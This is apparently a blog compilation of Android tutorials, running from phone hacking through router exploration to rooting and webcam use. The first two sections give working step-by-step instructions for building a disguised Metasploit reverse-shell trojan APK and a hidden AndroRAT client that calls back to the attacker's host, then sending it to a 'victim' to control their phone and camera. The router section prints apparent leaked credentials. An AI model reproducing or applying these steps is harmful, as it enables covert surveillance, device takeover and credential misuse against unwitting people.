How to Hack an android phone

Note – I will not be held responsible for anybodies actions , as this tutorial is for educational purposes.

Method 1 (Create your own Rat apk file)

You will need backtrack or kali-linux ,it’s available on their site for free at http://www.kali.org/downloads/.    Open up your new operating system using VMWare or by making a bootable USB. Here’s the 2 tools that you will need, either way will work.
When you have successfully booted into the OS , simply click the first option ” Default boot text mode ” and then a window will pop up that looks similar to command prompt. Type in ” startx ” and you will be in the GUI of the OS. Now we can finally start with the hacking phase. First go to the terminal. Type in the following commands.
1. apt-get update   ( make sure you are connected to the internet)
2. msfconsole
wait until the command fully loaded ( depends on your pc specs , it can take some time)
3. Execute this command in metasploit console
 Msfpayload android/meterpreter/reverse_tcp LHOST=<your internal IP> LPORT=<port for connection> R > trojan.apk
4. Then transfer trojan.apk to your android device and install APK Editor from google play to edit  the trojan.apk ( change icon and names ) so   that it looks like a legitimate app.
5. Send this apk file over to your victim’s phone.
6. Now going back to your open msfconsole window , type in the following to start your trojan.apk
7. use exploit/multi/handler
8. set lport < the port you used in trojan.apk >
9. exploit
Note – ** Don’t forget to make your IP static, as you don’t want your ip to change otherwise this won’t work **
And viola !! , you now have control of your victims phone.
You can access the victims directories , front-back camera and many more.
Method 2 ( Using Androrat )

Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). The goal of the application is to give the control of the android system remotely and retrieve informations from it.

  3. Now extract the file , Open AndroRat Binder.exe.
  4. Go to No-ip tab and fill your information & click on update.
  5. Go to Build Tab.
  6. In IP section, type the hostname  you have created by no-ip.
  7. In port section , type 81.
  8. In apk title ,Type any title you want.
  9. Check the hidden box to hide the apk from mobile’s app drawer.
  10. Click on Go.
  11. Now you will see the apk with the title you have given in the extracted folder.
  12. Now install that apk to any android mobile phone.
  13. You will find a folder named Androrat in the extracted files.
  14. Open Androrat>Androrat.jar (you should have java installed in your pc to open it).
  15. Now click on server> Select port and enter 81, click ok & restart it.
  16. Now , as soon as the android client is online , you will find it on the jar file ……select any server online.

How to Remove Ads from Android Apps, Games & Browser

Earlier I have posted on how you can easily remove all the spammy advertisements, bulky popups and any other virus attacking stuff in your windows computer without using any software, well this post is part of that thing and we are going to use the same thing for getting rid of advertisements in Android free apps, games and browsers you use to browse the web.
Now if you really feel bad watching all those bad advertisements in your free apps and games and even browsing some websites online then we have a simple solution that will block all those advertisements for free using no software.

Removing Advertisements from Android :)

So now the steps are pretty simple, we will be using that HOSTS file blocking trick to get this thing working, so now just follow below steps and enjoy.
  1. Open this text file online and copy its contents in a new notepad file or download it to your PC.
  2. Now you have the file if you have downloaded the file just make sure to rename the file as "hosts" its really important.
  3. So now you have the "hosts" file that you need to place in your Android device in order to remove all those advertisements.
  4. Now just transfer this file to your android device and open your file explorer on your android device. (use a free file explorer like F-explorer)
  5. Now just copy the file on your android device and paste it in to /etc or /system/etc, now if there is already a hosts file present just rename it to hosts.bak (to create backup of older hosts file)
  6. Now just paste your new hosts file over here, make sure you have the administrative right's to paste the file.
  7. That's it guys now just reboot your android device and see this trick working.
Now after you reboot your device you will see how all the advertisements in your apps, games and browser are vanished away, now sometime if might feel awkward as every single ad will be gone but still if you want a clean screen then this is the way.

How to hack BSNL router using Andriod

Introduction

Recently I was at home, playing with my BSNL router. For those who don't know what BSNL is, its the AT & T of India, known for very bad customer support :)

In this article, I will walk you through step by step illustrations on how to hack into your local router and explore it inside out. Though I am using my BSNL router here but steps and method will be similar for your modem/router as well.

Router Configuration

BSNL router is manufactured by SemIndia and distributed by ITI. It follows the tracks of using firmware of different routers (Broadcom to be specific, BCM6338 stands for Broadcom router firmware version 96338, deployed in US robotics ones and some other popular routers). Mine is DNA-A211-1, one of most popular ones in India.

Hacking Router with Android

To start with, I telnet into my router with my credentials and I am greeted with welcome screen as shown in screen below,

Once you are in, first step will be to figure out what are the services it has to offer, so I typed the usual 'help' and found following commands.

I started with basic command, "swversion" to get the version. Then with some hunting, I came to know that "sh" command runs over my router, ran it and voila, familiar interface of busybox snaps in.

Great, now thats worth something. For those who don't know hat busybox is, its a multicall binary. My android has it too. Seeing the version made me tick, it was running an older version of busybox.

Then I tried ls command, but it didn't work, hence tried "echo *" and it showed up everything as seen below

Next comes the magic command "cat /etc/passwd" and there we go again.

After that, I went on exploring other directories. Got into CVS and found information regarding CVS and pserver, note worthy one is the credentials of pserver.

pserver:xyzabc@192.168.128.19:/home/cvsroot

Not much of an interest though as they are of a private LAN. On googling, I found out that account belonged to XYZ (name changed for privacy), employee at SIEMIndia.

Next, I moved on to /etc directory,

lots of directories here, as a rule of thumb I opened default.cfg

Generic stuff, but what caught my eye was this line,

ppp_conId1 userName="multiplay" password="kIMa1bXVsdGlwbGF51AG"

This might come in handy (use your creativity :)).

But then I thought that why not to access the router from web interface. Logged in to it and then went to "management" and downloaded the backupsettings.conf file,

On opening, it was like as shown below,

I was not able to find the above credentials in it, hence I came to a conclusion that they must be somewhat for internal purposes.

Moving on, I thought why not to try to create an arbitrary file . Tried following command

echo 'rishrockz' >> rdx

But it failed. It was not easy to figure out the writable directory as I was not able to determine the file permissions since this version of busybox doesn't has ls or stat command.

Finally little bit of exploring found that /var is writable. Tried creating a file again, it succeeded !

Well, there is lot more to explore, this is just tip of iceberg! Next time I am be thinking of going to compile programs (http://people.debian.org/~debacle/cross/) and copying over them using echo (once I get a PC), I have got some nice ideas and will be hacking with them.

In the mean time, for those who are wondering what this machine has, here is the bootup log.

 :) enjoy it

Serious Vulnerability in Samsung Galaxy S4

Serious security vulnerability was recently discovered on the Samsung flagship Galaxy S4 device, claiming that attackers can use it to silently send text messages.
A rogue mobile application could contain code exploiting the vulnerability to send fraudulent scam text messages ordering premium-rate services, the firm said.
By exploiting the vulnerable cloud backup feature, malware could pretend to be the identity of any contact, friend, relative, or organization when faking phishing SMS messages. When these phishing SMS messages are received, users may be tricked into clicking fraudulent links or disclosing sensitive personal information.

This particular vulnerability is related to the “cloud backup” feature of Galaxy S4, which is not properly protected and can be abused. From the study, malicious software could potentially exploit it to send fraudulent scam text messages (to order premium-rated services) or fake incoming SMS messages (for phishing).
Qihoo recommends S4 users temporarily disable the cloud backup feature when not in use. A temporary fix has also been made by Qihoo 360, and can be deactivated once the security flaw has been patched.

How to Root Your Android Phone or Tablet

How to Root Your Android Phone or Tablet
We love Android, but rooting your phone can give you the opportunity to do so much more than your phone can do out of the box—whether its wireless tethering, speeding it up with overclocking, or customizing the look of your phone with themes. A rooted Android device unlocks its potential, allowing users to deceive the limitations placed upon it by carriers and hardware manufacturers.
Why Root?
Let's start with why you would want to root your Android smartphone. Sometimes apps require special permission that the Android OS, which is based on Linux doesn't allow. These could be simple as taking a screenshot to higher level permissions to the core Android files. Rooting makes your phone faster, increases battery life, allows it to run more apps, custom software and ROMs which allow complete control over every aspect of your device by allowing superuser and admin level permission.

How to Root Android Phone or Tablet?
Internet is loaded with tonnes of rooting methods and software, and one of the best method that I've tested is via SRS One Click Root. SRS-Root is an easy to use solution for rooting your android device, the software contains multiple exploits to gain root access on your device. Benefits of using SRS-Root :

    SRSRoot Supports Android versions 1.5, 2.1, 2.2, 2.3, 3.1, 3.2, 4.0, 4.1, 4.2
    Root latest models like Samsung Galaxy S2 / S3, Note / Note2
Option to remove root from your device by one-click
Powered by SRS Server "Safe Rooting without flashing your device"

Procedure to Root Android Phone or Tablet :

Download and Install SRS-Root [CLICK HERE TO DOWNLOAD]
Enable 'USB debugging' on your device (you can find this in the settings menu)
Enable 'Unknown Sources' on your device (you can find this in the settings menu)
Connect your Phone or Tablet to the computer (If needed install the android drivers)
Click on Root Device(All Methods) and wait till it's finished.
Clik on UnRoot Device(If you want to UnRoot)

 enjoyyyyyyyyy......

[[TUT]]Android Device As A PC Webcam

[[TUT]]Android Device As A PC Webcam
These days most new laptops feature an integrated webcam, often with an impressive number of megapixels. Users with older, and desktop computers still have to rely on an external one.
But if you’re not in a long distance relationship, or regularly make conference calls for work, chances are you’ve never even bought one.
If you need to make a few Skype calls or want to start a Hangout on Google Plus, but don’t have the necessary equipment at hand, don’t run off to the hardware store just yet! If you have an Android smartphone with camera, you can simply use your phone instead. Given, the framerate will not be on par with a decent store-bought webcam, but it’s more than good enough for a sporadic video chat.
1. Prerequisites
The tool we’re going to use is called SmartCam. The application is twofold; to use it you’ll need to install both the Android client   https://play.google.com/store/apps/details?id=com.smartcam.webcam   and the desktop client   http://sourceforge.net/projects/smartcam/    . This desktop client is available for Windows and Linux computers. In this article we’re going to focus on Windows, but the process is similar if you’re using Linux.
Make sure you’ve installed both applications before continuing to the next step.
2. Configuration
There are two ways to connect SmartCam to your computer; Wi-Fi and BlueTooth. We’ll show you how to connect over Wi-Fi.
First open SmartCam on your Android phone, press the menu button on your phone to show the available options, and select Settings. Here, select TCP/IP (WiFi) as your Connection type, and enter the local IP address of your computer under Remote server.
You can find the local IP address of a Windows computer using Command Prompt. Open command prompt by searching for it in your Applications, or by running “cmd” in the Start menu.
In Command Prompt, enter “ipconfig /all” and press enter. There’ll be a lot of information here; a block of data for every (virtual) network adapter. If your computer also accesses the internet through Wi-Fi, look for the IPv4 address of your Wireless LAN adapter. If your computer uses a cable to connect to the internet, look for an ethernet adapter.
Open SmartCam on your computer as well, and make sure the connection type in the preferences pane is also set to use TCP/IP (WiFi).
3. Connecting
Turn on the Wi-Fi connectivity on your Android, and connect your phone to the same network that your computer is on. With SmartCam already open on your computer, launch the application on your Android phone and select Menu -> Connect WiFi.

n less than a minute, the image of your Android phone camera should appear in the SmartCam application on your desktop, with the video resolution and framerate visible below the video stream. If you’re so inclined, you can also record this input to a video file on your desktop. To use your makeshift webcam in another application, simply select SmartCam as your webcam when prompted.
Enjoy Guys
